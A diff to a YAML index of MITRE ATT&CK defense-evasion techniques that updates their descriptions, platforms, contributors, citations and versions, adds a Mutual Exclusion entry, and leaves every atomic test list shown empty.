-        Adversaries may abuse these features for [Defense Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary execution while subverting detections and/or mitigation controls (such as Group Policy) that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file extensions more commonly associated with malicious payloads.
-      modified: '2022-05-24T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Indirect Command Execution
-      x_mitre_detection: 'Monitor and analyze logs from host-based detection mechanisms,
-        such as Sysmon, for events such as process creations that include or are resulting
-        from parameters associated with invoking programs/commands/files and/or spawning
-        child processes/network connections. (Citation: RSA Forfiles Aug 2017)'
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: defense-evasion
-      x_mitre_is_subtechnique: false
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'Process: Process Creation'
-      x_mitre_defense_bypassed:
-      - Static File Analysis
-      - Application Control
-      x_mitre_attack_spec_version: 2.1.0
+          cmd? What about forfiles?. Retrieved September 12, 2024.
+        url: https://x.com/vector_sec/status/896049052642533376
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1202
     atomic_tests: []
   T1140:
@@ -3402,22 +3470,24 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1140
     atomic_tests: []
   T1562:
     technique:
-      modified: '2023-10-20T16:43:53.391Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Impair Defenses
-      description: |-
+      description: |+
         Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
 
-        Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)
+        Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out, preventing a system from shutting down, or disabling or modifying the update process. Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Google Cloud Mandiant UNC3886 2024)(Citation: Emotet shutdown)
 
-        Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Jamie Williams (U ω U), PANW Unit 42
+      - Liran Ravich, CardinalOps
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools.  Lack of log events may be suspicious.
@@ -3426,15 +3496,17 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Office 365
       - IaaS
       - Linux
       - macOS
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Cloud Service: Cloud Service Disable'
@@ -3472,15 +3544,17 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1562
         external_id: T1562
+      - source_name: Google Cloud Mandiant UNC3886 2024
+        description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+          Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+          Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+        url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
       - source_name: Emotet shutdown
         description: The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK
           File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.
         url: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562
     atomic_tests: []
   T1055.003:
@@ -3504,7 +3578,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:22:50.800Z'
       name: Thread Execution Hijacking
       description: "Adversaries may inject malicious code into hijacked processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -3552,13 +3626,11 @@ defense-evasion:
       - Anti-virus
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.003
     atomic_tests: []
   T1036:
     technique:
-      modified: '2024-03-08T17:00:59.133Z'
+      modified: '2024-10-16T20:10:38.450Z'
       name: Masquerading
       description: |-
         Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
@@ -3574,7 +3646,7 @@ defense-evasion:
       - Felipe Espósito, @Pr0teus
       - Elastic
       - Bartosz Jerzman
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
@@ -3599,6 +3671,7 @@ defense-evasion:
       - 'Process: Process Creation'
       - 'Image: Image Metadata'
       - 'Scheduled Job: Scheduled Job Metadata'
+      - 'User Account: User Account Creation'
       - 'File: File Metadata'
       - 'Scheduled Job: Scheduled Job Modification'
       - 'Command: Command Execution'
@@ -3616,8 +3689,8 @@ defense-evasion:
         external_id: T1036
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Elastic Masquerade Ball
         description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
           Retrieved October 31, 2016.'
@@ -3630,12 +3703,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036
     atomic_tests: []
   T1070.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:43:56.839Z'
       name: 'Email Collection: Mailbox Manipulation'
       description: "Adversaries may modify mail and mail application data to remove
         evidence of their activity. Email applications allow users and other programs
@@ -3672,9 +3744,8 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'File: File Deletion'
@@ -3712,14 +3783,13 @@ defense-evasion:
         url: https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.008
     atomic_tests: []
   T1055:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:45.488Z'
       name: Process Injection
       description: "Adversaries may inject code into processes in order to evade process-based
         defenses as well as possibly elevate privileges. Process injection is a method
@@ -3822,12 +3892,11 @@ defense-evasion:
         url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1055
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -3911,7 +3980,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218:
     technique:
@@ -3978,60 +4046,77 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218
     atomic_tests: []
   T1070.006:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Romain Dumont, ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
-      type: attack-pattern
-      created: '2020-01-31T12:42:44.103Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1070.006
-        url: https://attack.mitre.org/techniques/T1070/006
-      - url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
-        description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
-          of Anti-Forensics Techniques. Retrieved June 3, 2016.'
-        source_name: WindowsIR Anti-Forensic Techniques
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-30T15:14:56.021Z'
       name: 'Indicator Removal on Host: Timestomp'
       description: |-
-        Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
+        Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
+
+        Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
+
+        Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
+
+        Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
 
         Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Romain Dumont, ESET
+      - Mike Hartley @mikehartley10
+      x_mitre_deprecated: false
       x_mitre_detection: 'Forensic techniques exist to detect aspects of files that
         have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques)
         It may be possible to detect timestomping using file modification monitoring
         that collects information on file handle opens and can compare timestamp values.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
+      - 'Process: OS API Execution'
       - 'File: File Modification'
       - 'File: File Metadata'
+      - 'Command: Command Execution'
       x_mitre_defense_bypassed:
       - Host forensic analysis
-      x_mitre_permissions_required:
-      - root
-      - SYSTEM
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
+      created: '2020-01-31T12:42:44.103Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/006
+        external_id: T1070.006
+      - source_name: WindowsIR Anti-Forensic Techniques
+        description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
+          of Anti-Forensics Techniques. Retrieved June 3, 2016.'
+        url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
+      - source_name: Inversecos Timestomping 2022
+        description: 'Lina Lau. (2022, April 28). Defence Evasion Technique: Timestomping
+          Detection – NTFS Forensics. Retrieved September 30, 2024.'
+        url: https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html
+      - source_name: Magnet Forensics
+        description: Magnet Forensics. (2020, August 24). Expose Evidence of Timestomping
+          with the NTFS Timestamp Mismatch Artifact. Retrieved June 20, 2024.
+        url: https://www.magnetforensics.com/blog/expose-evidence-of-timestomping-with-the-ntfs-timestamp-mismatch-artifact-in-magnet-axiom-4-4/
+      - source_name: Double Timestomping
+        description: Matthew Dunwoody. (2022, April 28). I have seen double-timestomping
+          ITW, including by APT29. Stay sharp out there.. Retrieved June 20, 2024.
+        url: https://x.com/matthewdunwoody/status/1519846657646604289
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1070.006
     atomic_tests: []
   T1620:
@@ -4134,9 +4219,76 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1620
     atomic_tests: []
+  T1480.002:
+    technique:
+      modified: '2024-10-28T16:22:25.431Z'
+      name: Mutual Exclusion
+      description: |-
+        Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)
+
+        While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)
+
+        In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)
+
+        Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Manikantan Srinivasan, NEC Corporation India
+      - Pooja Natarajan, NEC Corporation India
+      - Nagahama Hiroki – NEC Corporation Japan
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: OS API Execution'
+      - 'File: File Creation'
+      type: attack-pattern
+      id: attack-pattern--49fca0d2-685d-41eb-8bd4-05451cc3a742
+      created: '2024-09-19T14:00:03.401Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1480/002
+        external_id: T1480.002
+      - source_name: Intezer RedXOR 2021
+        description: Joakim Kennedy and Avigayil Mechtinger. (2021, March 10). New
+          Linux Backdoor RedXOR Likely Operated by Chinese Nation-State Actor. Retrieved
+          September 19, 2024.
+        url: https://intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/
+      - source_name: Sans Mutexes 2012
+        description: Lenny Zeltser. (2012, July 24). Looking at Mutex Objects for
+          Malware Discovery & Indicators of Compromise. Retrieved September 19, 2024.
+        url: https://www.sans.org/blog/looking-at-mutex-objects-for-malware-discovery-indicators-of-compromise/
+      - source_name: ICS Mutexes 2015
+        description: Lenny Zeltser. (2015, March 9). How Malware Generates Mutex Names
+          to Evade Detection. Retrieved September 19, 2024.
+        url: https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429/
+      - source_name: Microsoft Mutexes
+        description: Microsoft. (2022, March 11). Mutexes. Retrieved September 19,
+          2024.
+        url: https://learn.microsoft.com/en-us/dotnet/standard/threading/mutexes
+      - source_name: Deep Instinct BPFDoor 2023
+        description: Shaul Vilkomir-Preisman and Eliran Nissan. (2023, May 10). BPFDoor
+          Malware Evolves – Stealthy Sniffing Backdoor Ups Its Game. Retrieved September
+          19, 2024.
+        url: https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1564.011:
     technique:
       modified: '2023-11-06T20:14:51.609Z'
@@ -4200,57 +4352,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1497.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Jorge Orchilles, SCYTHE
-      - Ruben Dodge, @shotgunner101
-      - Jeff Felling, Red Canary
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
-      type: attack-pattern
-      created: '2020-03-06T21:11:11.225Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.003
-        url: https://attack.mitre.org/techniques/T1497/003
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Revil Independence Day
-        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
-        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
-          supply chain exploit to attack hundreds of businesses. Retrieved September
-          30, 2021.'
-      - source_name: Netskope Nitol
-        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
-        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
-          with evasive sandbox analysis technique. Retrieved September 30, 2021.
-      - source_name: Joe Sec Nymaim
-        url: https://www.joesecurity.org/blog/3660886847485093803
-        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
-          API hammering. Retrieved September 30, 2021.
-      - source_name: Joe Sec Trickbot
-        url: https://www.joesecurity.org/blog/498839998833561473
-        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
-          Retrieved September 30, 2021.
-      - source_name: ISACA Malware Tricks
-        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
-        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
-          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.048Z'
       name: Time Based Evasion
       description: |-
         Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
@@ -4265,6 +4370,12 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Jorge Orchilles, SCYTHE
+      - Ruben Dodge, @shotgunner101
+      - Jeff Felling, Red Canary
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'Time-based evasion will likely occur in the first steps
         of an operation but may also occur throughout as an adversary learns the environment.
         Data and events should not be viewed in isolation, but as part of a chain
@@ -4274,9 +4385,14 @@ defense-evasion:
         implementation and monitoring required. Monitoring for suspicious processes
         being spawned that gather a variety of system information or perform other
         forms of Discovery, especially in a short period of time, may aid in detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -4286,13 +4402,49 @@ defense-evasion:
       - Signature-based detection
       - Static File Analysis
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+      created: '2020-03-06T21:11:11.225Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/003
+        external_id: T1497.003
+      - source_name: Joe Sec Nymaim
+        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+          API hammering. Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/3660886847485093803
+      - source_name: Joe Sec Trickbot
+        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+          Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/498839998833561473
+      - source_name: ISACA Malware Tricks
+        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+      - source_name: Revil Independence Day
+        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+          supply chain exploit to attack hundreds of businesses. Retrieved September
+          30, 2021.'
+        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+      - source_name: Netskope Nitol
+        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+          with evasive sandbox analysis technique. Retrieved September 30, 2021.
+        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1497.003
     atomic_tests: []
   T1218.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T19:35:43.077Z'
       name: 'Signed Binary Proxy Execution: CMSTP'
       description: |-
         Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
@@ -4338,8 +4490,8 @@ defense-evasion:
         external_id: T1218.003
       - source_name: Twitter CMSTP Usage Jan 2018
         description: Carr, N. (2018, January 31). Here is some early bad cmstp.exe...
-          Retrieved April 11, 2018.
-        url: https://twitter.com/ItsReallyNick/status/958789644165894146
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/958789644165894146
       - source_name: Microsoft Connection Manager Oct 2009
         description: Microsoft. (2009, October 8). How Connection Manager Works. Retrieved
           April 11, 2018.
@@ -4358,13 +4510,12 @@ defense-evasion:
         url: http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
       - source_name: Twitter CMSTP Jan 2018
         description: Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution
-          applocker bypass. Retrieved April 11, 2018.
-        url: https://twitter.com/NickTyrer/status/958450014111633408
+          applocker bypass. Retrieved September 12, 2024.
+        url: https://x.com/NickTyrer/status/958450014111633408
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.003
     atomic_tests: []
   T1562.002:
@@ -4479,7 +4630,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.002
     atomic_tests: []
   T1218.002:
@@ -4520,7 +4670,7 @@ defense-evasion:
         url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
         description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
           HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T19:01:55.821Z'
       name: 'Signed Binary Proxy Execution: Control Panel'
       description: |-
         Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
@@ -4559,8 +4709,6 @@ defense-evasion:
       - User
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.002
     atomic_tests: []
   T1599.001:
@@ -4583,7 +4731,7 @@ defense-evasion:
         url: https://tools.ietf.org/html/rfc1918
         description: IETF Network Working Group. (1996, February). Address Allocation
           for Private Internets. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T01:45:58.951Z'
       name: Network Address Translation Traversal
       description: "Adversaries may bridge network boundaries by modifying a network
         device’s Network Address Translation (NAT) configuration. Malicious modifications
@@ -4622,12 +4770,10 @@ defense-evasion:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1550:
     technique:
-      modified: '2024-04-12T21:18:23.798Z'
+      modified: '2024-10-15T16:09:19.001Z'
       name: Use Alternate Authentication Material
       description: "Adversaries may use alternate authentication material, such as
         password hashes, Kerberos tickets, and application access tokens, in order
@@ -4654,6 +4800,7 @@ defense-evasion:
         phase_name: lateral-movement
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Configure robust, consistent account activity audit policies
         across the enterprise and with externally accessible services.(Citation: TechNet
@@ -4671,12 +4818,12 @@ defense-evasion:
